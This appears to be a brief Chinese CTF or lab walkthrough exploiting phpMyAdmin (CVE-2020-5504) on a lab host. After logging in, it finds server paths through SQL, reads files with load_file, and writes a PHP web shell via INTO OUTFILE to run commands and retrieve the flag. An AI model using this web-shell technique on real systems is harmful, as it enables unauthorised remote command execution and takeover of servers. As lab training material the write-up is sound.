phpmyadmin SQL注入 漏洞(CVE-2020-5504)
- 访问IP地址(10.9.47.6:24643),发现错误
- 根据镜像给的信息(后台路径和用户名密码)进行访问并登录
- 登录成功进入后台,点击sql
- 输入 select @@datadir(查询数据库的路径),点击go查看
- 输入 select @@basedir(查询Mysql的安装路径)
- 查看 select load_file('/var/www/html/pma/index.php'),点击go
- 返回数据包3kib,一看就有东西,所以网站绝对路径为/var/www/html/pma
- 输入(select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE '/var/www/html/pma/shell.php')构造木马
- 使用传入的参数cmd传入值,获取flag